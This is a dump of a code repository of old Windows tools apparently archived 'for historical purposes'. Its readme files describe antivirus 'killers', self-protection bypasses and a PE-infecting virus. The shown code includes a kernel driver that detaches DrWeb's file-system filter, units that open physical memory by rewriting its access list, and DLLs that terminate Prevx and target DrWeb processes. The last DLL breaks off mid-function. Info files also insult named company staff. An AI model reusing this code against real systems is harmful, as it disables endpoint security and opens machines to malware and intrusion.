├── Source ├── Icie │ ├── info.txt │ └── Icie.dpr ├── SpiDiE │ ├── SPiDiE_by_rinn_2012 │ │ ├── SpiDiE_EX │ │ │ └── dll │ │ │ │ ├── export.def │ │ │ │ └── main.cpp │ │ ├── SpiDiE_v1.6 │ │ │ ├── Stub.pas │ │ │ ├── Ring0.pas │ │ │ └── SpiDiE.dpr │ │ └── dwbypass │ │ │ └── dll │ │ │ └── main.cpp │ ├── v1.3 beta │ │ ├── Ring0.pas │ │ └── SpiDiE.dpr │ ├── v1.5 RC │ │ ├── SpiDiE.dpr │ │ └── Stub.pas │ ├── DwUnProt │ │ ├── 1.1 │ │ │ └── main.cpp │ │ └── 1.0 │ │ │ └── main.cpp │ ├── v1.2 release │ │ ├── Ring0.pas │ │ ├── SpiDiE.dpr │ │ ├── version.rc │ │ └── resource.h │ ├── v1.3 release │ │ ├── Ring0.pas │ │ └── SpiDiE.dpr │ ├── v1.0 beta │ │ └── Old_SpiDiE.dpr │ ├── v1.4 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.1 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.2 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.3 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.5 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.6 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.7 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.5 release │ │ ├── SpiDiE.dpr │ │ ├── Stub.pas │ │ └── Ring0.pas │ ├── v2.0 release │ │ └── SpiDiE.dpr │ ├── v2.1 release │ │ └── SpiDiE.dpr │ ├── v2.1.1 release │ │ └── SpiDiE.dpr │ ├── v2.2 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ ├── v1.4.4 G2 release │ │ ├── SpiDiE.dpr │ │ └── dwunprot.dpr │ └── info.txt ├── RTL │ ├── RTL.pas │ └── FPU.pas ├── oXueTb │ ├── oXueTb.dpr │ ├── info.txt │ └── oxuetb_lib.dpr ├── CsrWalker │ ├── 9090.bmp │ ├── Resources.res │ └── bypass_csrwalker.c ├── SilentDeath │ ├── vcode.res │ └── info.txt ├── OpPrevx │ ├── Blovex │ │ └── Blovex_lib.dpr │ ├── v1.0.179 │ │ └── UnPrevx.dpr │ ├── v1.0.185 │ │ └── UnPrevx.dpr │ ├── v1.1.199 │ │ ├── UnPrevx.dpr │ │ └── main.cpp │ ├── v1.1.209 │ │ ├── UnPrevx.dpr │ │ └── main.cpp │ ├── info.txt │ ├── dev_191 │ │ └── unprevx_lib.dpr │ ├── v1.0.187 │ │ └── unprevx_lib.dpr │ ├── v1.1.220 │ │ └── lib.dpr │ ├── dev_190 │ │ └── unprevx_lib.dpr │ ├── v1.0.189 │ │ └── UnPrevx.dpr │ └── Bovex │ │ └── main.cpp ├── RkUnhooker_2027 │ └── RKUnHooker.DPR ├── RkUnhooker_1020 │ └── readme.txt └── Unreal_A │ └── Unreal.DPR ├── README.md └── Vault.sha256 /Source/Icie/info.txt: -------------------------------------------------------------------------------- 1 | Icie! v0.122r IceSword 1.22 usermode killer 2 | -------------------------------------------------------------------------------- /Source/SpiDiE/SPiDiE_by_rinn_2012/SpiDiE_EX/dll/export.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | ServiceMain -------------------------------------------------------------------------------- /Source/RTL/RTL.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/RTL/RTL.pas -------------------------------------------------------------------------------- /Source/Icie/Icie.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/Icie/Icie.dpr -------------------------------------------------------------------------------- /Source/oXueTb/oXueTb.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/oXueTb/oXueTb.dpr -------------------------------------------------------------------------------- /Source/CsrWalker/9090.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/CsrWalker/9090.bmp -------------------------------------------------------------------------------- /Source/oXueTb/info.txt: -------------------------------------------------------------------------------- 1 | XueTr (what is now known as ProcessHunter) usermode killer from 2010 year. 2 | -------------------------------------------------------------------------------- /Source/SilentDeath/vcode.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SilentDeath/vcode.res -------------------------------------------------------------------------------- /Source/CsrWalker/Resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/CsrWalker/Resources.res -------------------------------------------------------------------------------- /Source/SpiDiE/v1.3 beta/Ring0.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.3 beta/Ring0.pas -------------------------------------------------------------------------------- /Source/SpiDiE/v1.3 beta/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.3 beta/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.5 RC/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.5 RC/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/OpPrevx/Blovex/Blovex_lib.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/OpPrevx/Blovex/Blovex_lib.dpr -------------------------------------------------------------------------------- /Source/OpPrevx/v1.0.179/UnPrevx.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/OpPrevx/v1.0.179/UnPrevx.dpr -------------------------------------------------------------------------------- /Source/OpPrevx/v1.0.185/UnPrevx.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/OpPrevx/v1.0.185/UnPrevx.dpr -------------------------------------------------------------------------------- /Source/OpPrevx/v1.1.199/UnPrevx.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/OpPrevx/v1.1.199/UnPrevx.dpr -------------------------------------------------------------------------------- /Source/OpPrevx/v1.1.209/UnPrevx.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/OpPrevx/v1.1.209/UnPrevx.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/DwUnProt/1.1/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/DwUnProt/1.1/main.cpp -------------------------------------------------------------------------------- /Source/SpiDiE/v1.2 release/Ring0.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.2 release/Ring0.pas -------------------------------------------------------------------------------- /Source/SpiDiE/v1.3 release/Ring0.pas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.3 release/Ring0.pas -------------------------------------------------------------------------------- /Source/RkUnhooker_2027/RKUnHooker.DPR: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/RkUnhooker_2027/RKUnHooker.DPR -------------------------------------------------------------------------------- /Source/SilentDeath/info.txt: -------------------------------------------------------------------------------- 1 | SilentDeath 1.0 (aka Win32.Serva (c) AVers) PE infection virus for Win9X/WinNT from ~2002 year. 2 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.0 beta/Old_SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.0 beta/Old_SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.2 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.2 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.2 release/version.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.2 release/version.rc -------------------------------------------------------------------------------- /Source/SpiDiE/v1.3 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.3 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.1 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.1 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.2 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.2 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.3 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.3 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.5 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.5 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.6 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.6 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.7 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.7 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.5 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.5 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v2.0 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v2.0 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v2.1 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v2.1 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v2.1.1 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v2.1.1 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v2.2 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v2.2 release/SpiDiE.dpr -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.4 G2 release/SpiDiE.dpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Vault/HEAD/Source/SpiDiE/v1.4.4 G2 release/SpiDiE.dpr -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Vault 2 | * Various code from the past (for historical purposes). 3 | 4 | # Description 5 | 6 | Mostly sources found on old backup drives before they were recycled (well, not all but what can be posted at public). Some previously posted on rootkit.com. ~Customized Delphi 5 build environment unfortunately gone together with Windows 2003 R2 server in 2010.~ Everything restored from backup. 7 | -------------------------------------------------------------------------------- /Source/OpPrevx/info.txt: -------------------------------------------------------------------------------- 1 | OpPrevx 2010 2 | 3 | Prevx was an aggressively advertised fake security product developed by same name company. 4 | Company response on OpPrevx was pathetic crying all over wilderssecurity forums (product main promotion platform), weak trolling attempts by development, manager(!) and customers staff alongside with totally incompetent and useless fixes. 5 | 6 | Product development stopped after acquiring, and to the final build they were unable to retaliate. 7 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.2 release/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by version.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1001 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /Source/RkUnhooker_1020/readme.txt: -------------------------------------------------------------------------------- 1 | RootKit UnHooker v1.02 2 | free and with full source code 3 | 4 | Tool for detecting/removing hooks setted on system services 5 | 6 | Works under 32bit Win2000, WinXP, Win2003 7 | Requires Administrator privileges for run 8 | 9 | Buttons: 10 | Unhook All - unhooks all detected hooks 11 | Unhook selected - unhooks only selected in list 12 | Refresh - ;) 13 | Close - ;) 14 | Save List To File - create txt log file in selected directory 15 | 16 | build 23 17 | + load driver bug fixed 18 | + privileges check issue fixed 19 | 20 | build 22 21 | + SYSENTER hook detection 22 | + improved GUI and report generation 23 | 24 | build 21 25 | + module filenames decoding 26 | + SeLoadDriverPrivilege force 27 | + debug errors messages added 28 | 29 | build 19 30 | + driver is built in the executable 31 | + resizing 32 | + full unicode version lol 33 | + remember sorted column index on refresh ;) 34 | 35 | build 18 36 | + fixed unload driver bug 37 | + added "address" column 38 | + added "module" column 39 | 40 | build 14 41 | + initial release 42 | 43 | build < 14 44 | engineering builds -------------------------------------------------------------------------------- /Source/SpiDiE/v1.5 RC/Stub.pas: -------------------------------------------------------------------------------- 1 | { 2 | 3 | stub header file 4 | 5 | } 6 | unit Stub; 7 | 8 | interface 9 | 10 | uses Windows, WinNative, RTL; 11 | 12 | type 13 | TMessageBoxW = function(hWnd: HWND; lpText, lpCaption: PWideChar; uType: UINT): Integer; stdcall; 14 | 15 | function InitLoader(phUser32: PDWORD): BOOL; 16 | procedure UnInitLoader(); 17 | 18 | const 19 | User32DllPath: PWideChar = '\system32\user32.dll'; 20 | 21 | var 22 | huser32: THANDLE; 23 | MsgBoxW: TMessageBoxW; 24 | 25 | implementation 26 | 27 | function InitLoader(phUser32: PDWORD): BOOL; 28 | var 29 | buf: LBuf; 30 | begin 31 | result := false; 32 | strcpyW(buf, KI_SHARED_USER_DATA.NtSystemRoot); 33 | strcatW(buf, User32DllPath); 34 | huser32 := NativeLoadLibrary(buf); 35 | if (huser32 <> 0) then 36 | begin 37 | MsgBoxW := NativeGetProcAddress(huser32, 'MessageBoxW'); 38 | result := (@MsgBoxW <> nil); 39 | if (phUser32 <> nil) then phUser32^ := hUser32; 40 | end; 41 | end; 42 | 43 | procedure UnInitLoader(); 44 | begin 45 | if (huser32 <> 0) then LdrUnloadDll(huser32); 46 | end; 47 | 48 | end. 49 | 50 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.5 release/Stub.pas: -------------------------------------------------------------------------------- 1 | { 2 | 3 | stub header file 4 | 5 | } 6 | unit Stub; 7 | 8 | interface 9 | 10 | uses Windows, WinNative, RTL; 11 | 12 | type 13 | TMessageBoxW = function(hWnd: HWND; lpText, lpCaption: PWideChar; uType: UINT): Integer; stdcall; 14 | 15 | function InitLoader(phUser32: PDWORD): BOOL; 16 | procedure UnInitLoader(); 17 | 18 | const 19 | User32DllPath: PWideChar = '\system32\user32.dll'; 20 | 21 | var 22 | huser32: THANDLE; 23 | MsgBoxW: TMessageBoxW; 24 | 25 | implementation 26 | 27 | function InitLoader(phUser32: PDWORD): BOOL; 28 | var 29 | buf: LBuf; 30 | begin 31 | result := false; 32 | strcpyW(buf, KI_SHARED_USER_DATA.NtSystemRoot); 33 | strcatW(buf, User32DllPath); 34 | huser32 := NativeLoadLibrary(buf); 35 | if (huser32 <> 0) then 36 | begin 37 | MsgBoxW := NativeGetProcAddress(huser32, 'MessageBoxW'); 38 | result := (@MsgBoxW <> nil); 39 | if (phUser32 <> nil) then phUser32^ := hUser32; 40 | end; 41 | end; 42 | 43 | procedure UnInitLoader(); 44 | begin 45 | if (huser32 <> 0) then LdrUnloadDll(huser32); 46 | end; 47 | 48 | end. 49 | 50 | -------------------------------------------------------------------------------- /Source/SpiDiE/SPiDiE_by_rinn_2012/SpiDiE_v1.6/Stub.pas: -------------------------------------------------------------------------------- 1 | { 2 | 3 | stub header file 4 | 5 | } 6 | unit Stub; 7 | 8 | interface 9 | 10 | uses Windows, WinNative, RTL; 11 | 12 | type 13 | TMessageBoxW = function(hWnd: HWND; lpText, lpCaption: PWideChar; uType: UINT): Integer; stdcall; 14 | 15 | function InitLoader(phUser32: PDWORD): BOOL; 16 | procedure UnInitLoader(); 17 | 18 | const 19 | User32DllPath: PWideChar = '\system32\user32.dll'; 20 | 21 | var 22 | huser32: THANDLE; 23 | MsgBoxW: TMessageBoxW; 24 | 25 | implementation 26 | 27 | function InitLoader(phUser32: PDWORD): BOOL; 28 | var 29 | buf: LBuf; 30 | begin 31 | result := false; 32 | strcpyW(buf, KI_SHARED_USER_DATA.NtSystemRoot); 33 | strcatW(buf, User32DllPath); 34 | huser32 := NativeLoadLibrary(buf); 35 | if (huser32 <> 0) then 36 | begin 37 | MsgBoxW := NativeGetProcAddress(huser32, 'MessageBoxW'); 38 | result := (@MsgBoxW <> nil); 39 | if (phUser32 <> nil) then phUser32^ := hUser32; 40 | end; 41 | end; 42 | 43 | procedure UnInitLoader(); 44 | begin 45 | if (huser32 <> 0) then LdrUnloadDll(huser32); 46 | end; 47 | 48 | end. 49 | 50 | -------------------------------------------------------------------------------- /Source/OpPrevx/dev_191/unprevx_lib.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program unprevx; 7 | {$ENDIF} 8 | unit unprevx; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, RTL; 13 | 14 | const 15 | String1: PWideChar = '\BaseNamedObjects\AllowMePlease'; 16 | 17 | 18 | implementation 19 | 20 | var 21 | buf: LBuf; 22 | EventHandle: THANDLE; 23 | str1: UNICODE_STRING; 24 | attr: OBJECT_ATTRIBUTES; 25 | 26 | procedure main(); 27 | begin 28 | OutputDebugStringW('Test'); 29 | EventHandle := 0; 30 | 31 | RtlInitUnicodeString(@str1, String1); 32 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 33 | 34 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 35 | begin 36 | ZwClose(EventHandle); 37 | end else 38 | begin //if no event specified then kill that shit 39 | GetModuleHandleW(@buf); 40 | ExtractFileNameW(buf, buf); 41 | if (strcmpiW(buf, 'prevx.exe') = 0) then ExitProcess(0); 42 | end; 43 | end; 44 | 45 | asm 46 | call main 47 | xor eax, eax 48 | inc eax 49 | retn $000c 50 | end. 51 | 52 | -------------------------------------------------------------------------------- /Source/SpiDiE/info.txt: -------------------------------------------------------------------------------- 1 | OpDrWeb 2009, 2010 2 | 3 | With 5.0 release DrWeb (AV company from Russia) introduced special self-protection system and won several awards (https://www.anti-malware.ru/self_protection_2009 Platinum award, https://www.anti-malware.ru/antivirus_self_protection_test_2010 Platinum award). In reality all these were fake awards and DrWeb self-protection was a merely a joke than anything else. 4 | 5 | During OpDrWeb for about two years DrWeb staff, including their Daniloff CEO (aka VodkaMan) and especially ex-virus writer Gladkih & DrWeb forums clown Komarov demonstrated how they all mentally unbalanced, weak and pathetically stupid in their attempts to retaliate SpiDiE. They were unable to do anything with 5 and later 6 version of their "Platinum awarded" product despite ocean of burning butthurt on their forums and numerous failed attempts to break SpiDiE functionality (later including pathetic signaturing). 6 | 7 | In 2012 during self-protection bypass challenge on kernelmode.info forum nrin demonstated that even DrWeb 8 version was unable to prevent slightly modified SpiDiE. 8 | 9 | (SpiDiE - play on words, name constructed from Spider - DrWeb fs filter component name and Die) 10 | -------------------------------------------------------------------------------- /Source/SpiDiE/SPiDiE_by_rinn_2012/SpiDiE_v1.6/Ring0.pas: -------------------------------------------------------------------------------- 1 | unit Ring0; 2 | 3 | interface 4 | 5 | uses 6 | Windows, WinNative, RTL, CAcl; 7 | 8 | function OpenPhysicalMemory(mAccess: dword): THandle; 9 | 10 | implementation 11 | 12 | function OpenPhysicalMemory(mAccess: dword): THandle; 13 | var 14 | s1, PhysMemString: UNICODE_STRING; 15 | Attr: OBJECT_ATTRIBUTES; 16 | OldAcl, NewAcl: PACL; 17 | SD: PSECURITY_DESCRIPTOR; 18 | mHandle, sHandle: dword; 19 | begin 20 | Result := 0; 21 | mHandle := 0; 22 | 23 | RtlInitUnicodeString(@PhysMemString, PhysicalMemory); 24 | InitializeObjectAttributes(@Attr, @PhysMemString, OBJ_CASE_INSENSITIVE or 25 | OBJ_KERNEL_HANDLE, 0, nil); 26 | 27 | if (ZwOpenSection(@mHandle, READ_CONTROL or 28 | WRITE_DAC, @Attr) <> STATUS_SUCCESS) then Exit; 29 | 30 | if Internal_GetKernelSecurityInfo(mHandle, DACL_SECURITY_INFORMATION, nil, nil, 31 | @OldAcl, nil, SD) <> ERROR_SUCCESS then Exit; 32 | 33 | NewAcl := nil; 34 | Cacl_SetEntryInACL(mAccess, OldAcl, @NewAcl); 35 | if (NewAcl <> nil) then 36 | begin 37 | if (Internal_SetKernelSecurityInfo(mHandle, DACL_SECURITY_INFORMATION, nil, nil, NewAcl, nil) = STATUS_SUCCESS) then 38 | begin 39 | RtlInitUnicodeString(@s1, '\BaseNamedObjects\dwprot_suxx_and_we_guarantee'); 40 | InitializeObjectAttributes(@attr, @s1, OBJ_CASE_INSENSITIVE or OBJ_KERNEL_HANDLE, 0, nil); 41 | sHandle := 0; 42 | if (ZwCreateSymbolicLinkObject(@sHandle, SYMBOLIC_LINK_ALL_ACCESS, @attr, @PhysMemString) = STATUS_SUCCESS) then 43 | begin 44 | if (ZwOpenSection(@Result, mAccess, @attr) = STATUS_SUCCESS) then 45 | begin 46 | Internal_SetKernelSecurityInfo(mHandle, DACL_SECURITY_INFORMATION, nil, nil, OldAcl, nil); 47 | end; 48 | end; 49 | end; 50 | mmfree(NewAcl); 51 | end; 52 | ZwClose(mHandle); 53 | 54 | mmfree(SD); 55 | end; 56 | 57 | end. 58 | 59 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.5 release/Ring0.pas: -------------------------------------------------------------------------------- 1 | unit Ring0; 2 | 3 | interface 4 | 5 | uses 6 | Windows, WinNative, RTL, CAcl; 7 | 8 | var 9 | pntkernel: PVOID; 10 | 11 | function OpenPhysicalMemory(mAccess: dword): THandle; 12 | 13 | implementation 14 | 15 | function OpenPhysicalMemory(mAccess: dword): THandle; 16 | var 17 | s1, PhysMemString: UNICODE_STRING; 18 | Attr: OBJECT_ATTRIBUTES; 19 | OldAcl, NewAcl: PACL; 20 | SD: PSECURITY_DESCRIPTOR; 21 | mHandle, sHandle: dword; 22 | begin 23 | Result := 0; 24 | mHandle := 0; 25 | 26 | RtlInitUnicodeString(@PhysMemString, PhysicalMemory); 27 | InitializeObjectAttributes(@Attr, @PhysMemString, OBJ_CASE_INSENSITIVE or 28 | OBJ_KERNEL_HANDLE, 0, nil); 29 | 30 | if (ZwOpenSection(@mHandle, READ_CONTROL or 31 | WRITE_DAC, @Attr) <> STATUS_SUCCESS) then Exit; 32 | 33 | if Internal_GetKernelSecurityInfo(mHandle, DACL_SECURITY_INFORMATION, nil, nil, 34 | @OldAcl, nil, SD) <> ERROR_SUCCESS then Exit; 35 | 36 | NewAcl := nil; 37 | Cacl_SetEntryInACL(mAccess, OldAcl, @NewAcl); 38 | if (NewAcl <> nil) then 39 | begin 40 | if (Internal_SetKernelSecurityInfo(mHandle, DACL_SECURITY_INFORMATION, nil, nil, NewAcl, nil) = STATUS_SUCCESS) then 41 | begin 42 | RtlInitUnicodeString(@s1, '\BaseNamedObjects\dwprot_suxx_and_we_guarantee'); 43 | InitializeObjectAttributes(@attr, @s1, OBJ_CASE_INSENSITIVE or OBJ_KERNEL_HANDLE, 0, nil); 44 | sHandle := 0; 45 | if (ZwCreateSymbolicLinkObject(@sHandle, SYMBOLIC_LINK_ALL_ACCESS, @attr, @PhysMemString) = STATUS_SUCCESS) then 46 | begin 47 | if (ZwOpenSection(@Result, mAccess, @attr) = STATUS_SUCCESS) then 48 | begin 49 | Internal_SetKernelSecurityInfo(mHandle, DACL_SECURITY_INFORMATION, nil, nil, OldAcl, nil); 50 | end; 51 | end; 52 | end; 53 | mem_free_(NewAcl); 54 | end; 55 | ZwClose(mHandle); 56 | 57 | mem_free_(SD); 58 | end; 59 | 60 | end. 61 | 62 | -------------------------------------------------------------------------------- /Source/SpiDiE/DwUnProt/1.0/main.cpp: -------------------------------------------------------------------------------- 1 | #include ".\nulldrv\defines.h" 2 | #include ".\nulldrv\ntoskrnl.h" 3 | #include ".\nulldrv\rtl.h" 4 | 5 | PDRIVER_OBJECT 6 | NTAPI 7 | IoGetDriverObjectByName( 8 | IN PWSTR DriverLink 9 | ) 10 | { 11 | UNICODE_STRING DriverObjectName; 12 | PDRIVER_OBJECT drv1 = NULL; 13 | NTSTATUS Status; 14 | 15 | // DbgPrint("[~] Getting DriverObjectByName : %ws", DriverLink); 16 | 17 | RtlInitUnicodeString(&DriverObjectName, DriverLink); 18 | Status = ObReferenceObjectByName(&DriverObjectName, FILE_ATTRIBUTE_DEVICE, 0, 19 | OBJ_CASE_INSENSITIVE, IoDriverObjectType, KernelMode, 0, (PVOID *)&drv1); 20 | if (NT_SUCCESS(Status)) 21 | { 22 | ObfDereferenceObject(drv1); 23 | } 24 | // DbgPrint("[~] Result of operation %lx", Status); 25 | return drv1; 26 | } 27 | 28 | VOID DetachFilter2(PDRIVER_OBJECT drvobj, PDRIVER_OBJECT DwProt) 29 | { 30 | PDEVICE_OBJECT Prev, DeviceObject = NULL; 31 | 32 | Prev = NULL; 33 | DeviceObject = drvobj->DeviceObject; 34 | 35 | for( ; DeviceObject->AttachedDevice ; Prev = DeviceObject, DeviceObject = DeviceObject->AttachedDevice) { 36 | if (DeviceObject->DriverObject == DwProt) { 37 | // DbgPrint("[~] Found DWPROT filter DEVICE_OBJECT %lx, detaching from %lx", DeviceObject, Prev); 38 | IoDetachDevice(Prev); 39 | } 40 | } 41 | } 42 | 43 | #define FILESYSTEM L"\\FileSystem\\" 44 | #define DWPROT L"dwprot" 45 | #define NTFS L"ntfs" 46 | #define FASTFAT L"fastfat" 47 | 48 | VOID DetachFilter() 49 | { 50 | PDRIVER_OBJECT drvobj = NULL; 51 | PDRIVER_OBJECT DwProt = NULL; 52 | 53 | WCHAR obname[60]; 54 | RtlZeroMemory(obname, sizeof(obname)); 55 | 56 | strcpyW(obname, FILESYSTEM); 57 | strcatW(obname, DWPROT); 58 | 59 | DwProt = IoGetDriverObjectByName(obname); 60 | if (!DwProt) return; 61 | 62 | strcpyW(obname, FILESYSTEM); 63 | strcatW(obname, NTFS); 64 | 65 | drvobj = IoGetDriverObjectByName(obname); 66 | if (drvobj) { 67 | DetachFilter2(drvobj, DwProt); 68 | } 69 | 70 | strcpyW(obname, FILESYSTEM); 71 | strcatW(obname, FASTFAT); 72 | 73 | drvobj = IoGetDriverObjectByName(obname); 74 | if (drvobj) { 75 | DetachFilter2(drvobj, DwProt); 76 | } 77 | 78 | } 79 | 80 | NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) 81 | { 82 | DbgPrint("Bonjourno!"); 83 | 84 | DetachFilter(); 85 | 86 | return 0xC0000189; 87 | } -------------------------------------------------------------------------------- /Source/SpiDiE/SPiDiE_by_rinn_2012/dwbypass/dll/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "ntdll\ntdll.h" 4 | #include "ntdll\winnative.h" 5 | #include "rtls\prtl.h" 6 | 7 | #pragma warning(disable:4100) // warning C4100: unreferenced formal parameter 8 | 9 | #define ProcessesCount 6 10 | LPTSTR Processes[ProcessesCount] = { 11 | TEXT("dwengine.exe"), 12 | TEXT("dwarkdaemon.exe"), 13 | TEXT("spideragent.exe"), 14 | TEXT("dwscanner.exe"), 15 | TEXT("dwnetfilter.exe"), 16 | TEXT("spideragent_adm.exe") 17 | }; 18 | 19 | BOOL IsInList( 20 | LPTSTR szProcessName 21 | ) 22 | { 23 | INT i; 24 | 25 | for (i = 0; i < ProcessesCount; i++) { 26 | 27 | if (lstrcmpi(Processes[i], szProcessName) == 0) 28 | return TRUE; 29 | 30 | } 31 | return FALSE; 32 | } 33 | 34 | BOOL ListProcesses() 35 | { 36 | PROCESSENTRY32 Entry; 37 | HANDLE ShotHandle; 38 | HANDLE hProcess; 39 | BOOL IsDwService = FALSE; 40 | BOOL result = FALSE; 41 | 42 | Entry.dwSize = sizeof(PROCESSENTRY32); 43 | 44 | ShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 45 | if ( ShotHandle != INVALID_HANDLE_VALUE ) { 46 | if (Process32First(ShotHandle, &Entry)) { 47 | do { 48 | if ( IsInList(Entry.szExeFile) ) { 